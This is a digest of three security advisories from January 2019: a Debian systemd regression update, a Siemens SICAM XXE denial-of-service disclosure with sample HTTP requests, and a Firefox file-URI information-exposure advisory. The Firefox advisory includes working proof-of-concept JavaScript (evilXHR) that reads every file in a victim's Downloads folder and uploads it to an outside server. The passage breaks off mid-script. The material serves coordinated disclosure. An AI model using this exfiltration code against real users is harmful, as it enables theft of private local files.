[SECURITY] [DSA 4367-2] systemd regression update

[Salvatore Bonaccorso]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4367-2   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
January 15, 2019  https://www.debian.org/security/faq
- -

Package: systemd

The Qualys Research Labs reported that the backported security fixes
shipped in DSA 4367-1 contained a memory leak in systemd-journald. This
and an unrelated bug in systemd-coredump are corrected in this update.

Note that as the systemd-journald service is not restarted automatically
a restart of the service or more safely a reboot is advised.

For the stable distribution (stretch), these problems have been fixed in
version 232-25+deb9u8.

We recommend that you upgrade your systemd packages.

For the detailed security status of systemd please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/systemd

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlw+CIxfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND
z0TAOw/6AhNiQlXjFUuQojPreWohnhmdpDN+AWwT0xEL+f1mSxh1UXKCDjFYPqDT
oCCOPoCHchrXzZR3xv5PqhOvFzWEQnmWpku5MgE2gJ/2UJvjQ2CUzObuQ5f4/WVx
d+QMStfUhVCrzYdE/CECDg8HTJIb1ApqMTYRlS4NWQkZeBS6cLqfaNnn0++ZdU0O
uEUN7GH+/oF2kbzXZe5/Y+CsdJ6/Sy2ipHrQLh6ABkSz9yyuKC6tQiLqznpumqpk
nEejq5drLdAAEU2xC8hfbb485qvtxrFJMu3VXHY56aNnEY5kTjA/V7htN6gjIwE4
7xvUpFY2h6Rh5l46reQ7pigg5pQIyX8zd/PSCzpXkZY9ph3yr2OWCBGewa3LQfiN
A/MCY58oZ86uVKokbPIdFdWHXu0P0Ghzvoag7Z+bksRKHTR6FWeGt74Fcg/5Wl/b
hQhdrzJrf1mtI6HfV06NKyHjO3nWvzWgFvUAM8RX8yPU7J9ubf34vS5cWPU4MS2+
EQPmXWT72X/KolkalsvEOTsy54OdZmCIAiFbzLfQkVc26cu32Ka9YpIVRtv3WHxp
NuDVC8fS2jivQJ3F88rA2NKer/1sGLpmDZGcqOxOPUO+ibCQ9pyL94KsL0k2oLqd
t430+tu7AALHgLz/iW3v9dR1Qpvz7IRrXAPffVz+5ykIfRSDHpo=
=yZ9m
-END PGP SIGNATURE-

CVE-2018-13798 Siemens - SICAM A8000 Series Webinterface XXE DoS

[Advisories]

#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  SICAM A8000 Series
# Vendor:   Siemens
# CSNC ID:  CSNC-2019-002
# CVE ID:   CVE-2018-13798
# Subject:  SICAM Webinterface XXE DoS
# Risk: Medium (CVSS 3.0 Base Score: 5.3)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C
# Effect:   Unauthenticated remotely exploitable
# Authors:  Emanuel Duss 
#   Nicolas Heiniger 
# Date: 2019-01-14
#
#

Introduction


The Siemens SICAM A8000 RTU (Remote Terminal Unit) series is a modular device
range for telecontrol and automation applications in all areas of energy
supply. This device offers a web management interface for performing simple
management tasks.

During a penetration test, Compass found a denial-of-service vulnerability in
the Siemens SICAM web server. The web management interface is vulnerable
against the XXE billion laughs attack [2] using XML entities. Successful
exploitation can be performed unauthenticated over the network.

Affected


* SICAM A8000 CP-8000 < V14
* SICAM A8000 CP-802X < V14
* SICAM A8000 CP-8050 < V2.00

Technical Description
-

When a login on the web management interface is performed, the following
request is sent to the server:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42
Content-Type: application/xml
Content-Length: 118
Connection: close




By modifying the XML message, it's possible to perform a billion laughs denial
of service attack against the web management interface:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42/
Content-Type: application/xml
Content-Length: 1679
Connection: close



  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
]>



The XML parser on the device tries to resolve the external entities. This will
consume all available memory and the web management interface does not respond
anymore.

If the web management interface is refreshed in the browser, the following
message appears:

The device is currently unreachable. Retrying to connect.

Other services on the device, like the one used by the ToolboxII for
configuring the device or the IEC104 service, will still work properly and are
not affected by this attack. Only the web management interface remains unusable
until the device is rebooted.

It's not possible to use XXE to read local or remote files using the SYSTEM
directive.

Vulnerability Classification


* CVSS v3.0 Base Score: 5.3
* CVSS v3.0 Vector: 
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C

Remediation
---

* SICAM A8000 CP-8000: Update to V14
* SICAM A8000 CP-802X: Update to V14
* SICAM A8000 CP-8050: Update to V2.00 or higher

Please see the Siemens advisory [3] for the download links.

As a workaround, it's also possible to restrict the access to the webserver on
port 80/tcp and 443/tcp using a firewall.

Acknowledgments
---

We thank Siemens for the coordinated disclosure.

Timeline


2018-05-28:Vulnerability discovered by Emanuel Duss and Nicolas Heiniger
2018-05-28:Informed customer
2018-06-06:Initial vendor notification
2018-03-18:Vendor informed us that they will publish an advisory
2019-01-08:Siemens published advisory [3]
2019-01-11:Compass published advisory containing technical information

References
--

[1] 
https://w3.siemens.com/smartgrid/global/en/products-systems-solutions/substation-automation/substation-automation/pages/sicam-a8000.aspx
[2] https://www.owasp.org/index.php/XML_Security_Cheat_Sheet#Billion_Laughs
[3] https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt

[SYSS-2018-041] Mozilla Firefox - Information Exposure

[vladimir . bostanov]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2018-041
Product: Firefox
Manufacturer: Mozilla
Affected Versions: <= 64
Tested Versions: 61, 62, 63, 64
Vulnerability Type: Information Exposure (CWE-200)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2018-07-19
Solution Date: -
Public Disclosure: 2019-01-16
CVE Reference: Not yet assigned
Author of Advisory: Dr. Vladimir Bostanov, SySS GmbH

~~~

Overview:

Mozilla Firefox is a web browser available for various platforms including
Windows, Linux, Mac, Android, and iOS [1]. It is one of the most popular
web browsers according to StatCounter [2].

An overly liberal same-origin policy for file URIs and a bug in the
implementation of this policy make Firefox vulnerable to exposure of local
files to a remote attacker.

~~~

Vulnerability Details:

Firefox's same-origin policy for file URIs allows local files to read
other files in the same directory but not the directory index [3]. For
example, a file with the URI file:///home/joe/Dowloads/aFile.html can read
file:///home/joe/Dowloads/anotherFile.html, but it should not be able to
read file:///home/joe/Dowloads/. We discovered, however, a violation of
this policy in the special case when a user first opens a local directory,
e.g., file:///home/joe/Dowloads/, in the browser and from there navigates
to a file in this directory, e.g., file:///home/joe/Dowloads/aFile.html.
In this case, aFile.html can read the Downloads directory index. This
allows a malicious script in aFile.html to read all files in this
directory by referring to each of them by its respective filename, and to
send all the data to a remote server controlled by the attacker.

The following attack scenario seems plausible. A user saves a HTML file in
the Downloads folder. The victim user might have received the file per
email; or downloaded it from a malicious website offering, e.g. free
eBooks, or picture albums, etc.; or downloaded it from a corporate website
where a malicious employee had uploaded it. The victim clicks on the
filename in the file manager. The file is opened with the default Firefox
browser. The victim is presented with a directory index and a message
explaining that the file is "protected" and the user should open it in
"safe mode" by clicking on the link in the directory index. The victim
clicks again on the filename, this time in the browser's directory
listing. The contents of the HTML document is displayed. In the
background, the malicious JavaScript reads, first, the directory index,
then, the contents of each file in the Downloads directory, and sends all
these data to a website controlled by the attacker.

~~~

Proof of Concept (PoC):

We offer a test website [5] where a user can check if a browser is
vulnerable to evilXHR. The above scenario is implemented by the following
HTML file evilXHR.html:

evilXHR


https://ptvb.sy.gs/evilXHR/base64ArrayBuffer.js";>



// The script will be called from this HTML file:
var htmlName = 'evilXHR.html';

// Files will be uploaded to this site:
var siteURL = 'https://ptvb.sy.gs/evilXHR/';
var phpURL = siteURL + 'upload.php';

var cType = 'application/x-www-form-urlencoded';
var guID = Date.now() + Math.random().toString().substr(3,8);
var uploadPathURL = siteURL + 'Uploads/' + guID;
//---
function singleFileEvilXHR(fName)
  {
  var xGetFile = new XMLHttpRequest();
  xGetFile.onreadystatechange = function()
{
if (this.readyState == 4)
  {
  var xPostFile = new XMLHttpRequest();
  xPostFile.open('POST', phpURL);
  var fURL = encodeURIComponent(this.responseURL);
  var fData = encodeURIComponent(base64ArrayBuffer(this.response));
  xPostFile.setRequestHeader('Content-Type', cType);
  xPostFile.send('guID='+guID + '&fURL='+fURL + '&fData='+fData);
  }
}
  xGetFile.open('GET', fName);
  xGetFile.responseType = 'arraybuffer';
  xGetFile.send();
  }
//---
function allFilesEvilXHR()
  {
  var xGetDir = new XMLHttpRequest();
  xGetDir.onreadystatechange = function()
{
if (this.readyState == 4)
  {
  var xPostDir = new XMLHttpRequest();
  xPostDir.open('POST', phpURL);
  var dData = encodeURIComponent(this.response);
  xPostDir.setRequestHeader('Content-Type', cType);
  xPostDir.send('guID=' + guID + '&dData=' + dData);
  var dirIndex = this.response.split('\n');
  for (var n = 2; n < dirIndex.length-1; n++)
{
var dirIndexEntry = dirIndex[n].split(' ');
if (dirIndexEntry[4] == 'FILE' && dirIndexEntry[1] != htmlName)
  {
  singleFileEvilXHR(dirIndexEntry[1]);
  }
}
  }
}